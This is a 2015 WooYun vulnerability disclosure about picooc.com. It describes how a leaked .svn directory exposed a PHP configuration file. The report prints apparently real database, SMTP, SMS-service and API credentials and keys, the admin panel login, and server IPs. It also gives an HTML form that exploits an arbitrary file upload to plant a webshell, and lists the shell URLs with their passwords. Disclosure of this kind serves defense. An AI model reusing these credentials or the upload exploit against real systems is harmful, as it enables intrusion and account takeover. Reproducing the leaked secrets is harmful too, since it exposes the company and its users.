当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123721

漏洞标题:有品网某配置不当导致官网沦陷(service@picooc.com账号已被劫持)

相关厂商:picooc.com

漏洞作者: mango

提交时间:2015-06-30 17:09

修复时间:2015-08-14 17:12

公开时间:2015-08-14 17:12

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-30: 细节已通知厂商并且等待厂商处理中
2015-06-30: 厂商已经确认,细节仅向厂商公开
2015-07-10: 细节向核心白帽子及相关领域专家公开
2015-07-20: 细节向普通白帽子公开
2015-07-30: 细节向实习白帽子公开
2015-08-14: 细节向公众公开

简要描述:

有品

详细说明:

.svn泄漏
http://www.picooc.com/.svn/entries
http://bbs.picooc.com/.svn/entries
泄漏很多东西 包括 mysql账号 发现 所有账号密码都一样的

['user']       = 'admin'; 
]['password'] = 'picooc_1+1!=3';


LP`C97M6}3GDF[$6IB(O`%3.jpg


<?php
/*****************数据库配置*****************/
$config['mysql']['host'] = 'picooc03'; // MYSQL 服务器IP地址
$config['mysql']['port'] = 3306; // '' 为默认端口 3305
$config['mysql']['db'] = 'picooc'; // 数据库名
$config['mysql']['user'] = 'admin'; // MYSQL 用户名
$config['mysql']['password'] = 'picooc_1+1!=3'; // MYSQL 用户口令


$config['mysql']['host_dev'] = 'picooc03'; // MYSQL 服务器IP地址
$config['mysql']['port_dev'] = 3306; // '' 为默认端口 3305
$config['mysql']['db_dev'] = 'picooc_dev'; // 数据库名
$config['mysql']['user_dev'] = 'admin'; // MYSQL 用户名
$config['mysql']['password_dev'] = 'picooc_1+1!=3'; // MYSQL 用户口令

$config['mysql']['db_address'] = 'address'; // 获取IP地址的数据库名

$config['mysql']['pre'] = 'v2_'; //表前缀
/*****************************************/


/**
* memcache配置
*/
$config['memcache']['host'] = 'picooc03';
$config['memcache']['port'] = '11211';
/**
* SMTP配置
*/
$config['smtp']['server'] = 'smtp.exmail.qq.com';
$config['smtp']['port'] = 25;
$config['smtp']['useremail'] = 'service@picooc.com'; //发信人的email
$config['smtp']['password'] = 'picooc201312'; //发信人的email密码
$config['smtp']['mailfrom'] = 'PICOOC'; //发送人
/**
* 百度推送
*/
$config['baidu_push_dev']['app_id'] = '1706572';
$config['baidu_push_dev']['app_key'] = '7Y4L3bMxLgil7WbPuDyaaPCa';
$config['baidu_push_dev']['secrect_key'] = 'duGlkwl72jGEfu5hgKQsXbVgF8XVrWQ1';
$config['baidu_push_dev']['deploy_status'] = 1; //1为开发版 2为正式版
$config['baidu_push_dev']['alert_sound'] = 'latin.m4r';
$config['baidu_push']['app_id'] = '1706572';
$config['baidu_push']['app_key'] = '7Y4L3bMxLgil7WbPuDyaaPCa';
$config['baidu_push']['secrect_key'] = 'duGlkwl72jGEfu5hgKQsXbVgF8XVrWQ1';
$config['baidu_push']['deploy_status'] = 2; //1为开发版 2为正式版
$config['baidu_push']['alert_sound'] = 'latin.m4r';
/**
* 百度restful接口
*/
$config['baidu_rest']['access_token_lifetime'] = 86400*365; //三个月
$config['baidu_rest']['table_url'] = 'https://pcs.baidu.com/rest/2.0/structure/table';
/**
* 短信验证码
*/
$config['sudas_sms']['notice_no'] = '13501327047';
$config['sudas_sms']['notice_num'] = 2000;
$config['sudas_sms']['sn'] = 'SDK-KEY-010-00095';
$config['sudas_sms']['pwd'] = 'c9@dcff@';
$config['sudas_sms']['sign'] = '【有品】';
$config['sudas_sms']['url'] = 'http://sdk2.sudas.cn:8060/z_mdsmssend.aspx';
$config['sudas_sms']['balance_url'] = 'http://sdk2.sudas.cn:8060/z_balance.aspx';
$config['sudas_sms']['content'] = '(PICOOC验证码),为了保护您的帐号安全,验证短信请勿转发给其他人'.$config['sudas_sms']['sign'];
$config['sudas_sms']['balance_content'] = '短信验证码余量已到警戒线,请尽快充值'.$config['sudas_sms']['sign'];
/**
* 短信验证码 云通讯
*/
$config['yuntongxun_sms']['account_sid'] = '8a48b55149e0e7a20149ea0a51470597';
$config['yuntongxun_sms']['auth_token'] = 'ac3abfaaf4314b9c99be0e830f5a96c3';
$config['yuntongxun_sms']['url'] = 'app.cloopen.com';
$config['yuntongxun_sms']['sandbox_url'] = 'sandboxapp.cloopen.com';
$config['yuntongxun_sms']['sdk_version'] = '2013-12-26';
$config['yuntongxun_sms']['port'] = 8883;
$config['yuntongxun_sms']['template_id'] = 9121;
$config['yuntongxun_sms']['sandbox_template_id'] = 9121;
$config['yuntongxun_sms']['app_id'] = 'aaf98f8949e0e5ac0149ea0ebd320562';
/**
* 消息队列
*/
$config['msq']['host'] = 'picooc01';
$config['msq']['port'] = '1218';
$config['msq']['queue_name'] = 'picooc_msq';
$config['msq']['queue_retry_name'] = 'picooc_retry_msq';
$config['msq']['password'] = 'picooc';
/**
* 百度LBS token
*/
$config['baidu_lbs']['url'] = 'http://api.map.baidu.com/location/ip';
$config['baidu_lbs']['token'] = 'D48b6ea3d99e9321a52639f8d2d5c381';
/**
* 网站单点登录配置信息
*/
$config['portal']['url'] = "www.picooc.com";//网站url
$config['portal']['encrypt'] = array('cipher'=>MCRYPT_RIJNDAEL_128,'mode'=>MCRYPT_MODE_CBC,'key'=>'picooc2014');//对称加密配置信息
/**
* latin购买链接
*/
$config['buy_url']['latin']['jd'] = 'http://m.jd.com/product/1257159.html';
/**
* 手机号邮箱验证正则过滤 '/^13\d{9}$|^170\d{8}$|^15[0|1|2|3|5|6|7|8|9]\d{8}$|^18[0|1|2|3|5|6|7|8|9]\d{8}$|^14[5|7]\d{8}$/';
*/
$config['pattern']['phone_no'] = '/^1[3|4|5|6|7|8|9]\d{9}$/';
$config['pattern']['email'] = "/^([a-z0-9_\-\.]+)@(([a-z0-9]+[_\-]?)\.)+[a-z]{2,3}$/i";
/**
* 版本更新
*/
$config['version']['android'] = '25';
i7gaI179H0JelaIdj1rec2r8uei8t2h142rasb71xam8L4a3gb90e6Lcg0Z3l53a
$config['version']['ios'] = '2.0';


泄漏很多问题 包括service@picooc.com 服务密码

H_)Y_(O9XP@7L8E0T`V{FST.png


NJK1L380SHO@84H@1IR59UN.png


115.28.58.73
106.2.211.86
都支持外联都是上面的密码

YCGX2C3~YV@R[{~SFX$3V~H.png


在数据库翻到了 官网后台密码
http://www.picooc.com/cmsadmin/
picooc pic

GZ`{(I_QR1NKJ)FLV6PLQ8F.png


后台不能上传很蛋疼
但是
http://test.picooc.com
这是官网的备份站
他可以起上传而且后台密码都可以登录

)$9FR]S9}PTBL)I918E0RSX.png


ck编辑器任意上传~~
http://test.picooc.com/upload/20150630/102.php -7

H_Z%5$I)@RA]NYB)C0V1H$1.png


漏洞证明:

虽然是备份站 和官网源码还是一样的 经过分析发现
http://www.picooc.com/picooc/up/index.php
存在任意上传

`DB@FLU%N6`3%W@UKNBW)EX.png


sign要根据路径来变
构造上传点

<form enctype="multipart/form-data" action="http://www.picooc.com/picooc/up/index.php?sign=D3F5CE9E79DE5F841F0EA8DC2FCA1A5B" method="post" >  
<input type="file" name="file">
<input type="submit" value="ok">
</form>


得到shell
http://www.picooc.com//picooc//upload//20150630//296240.php c3

64%1)%{8)6A2W4YKC]ZR5@X.png


站点很多就不一一说了

I%_%A56$O5F_T4)0R6Q~]2S.png

修复方案:

版权声明:转载请注明来源 mango@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-30 17:11

厂商回复:

谢谢

最新状态:

暂无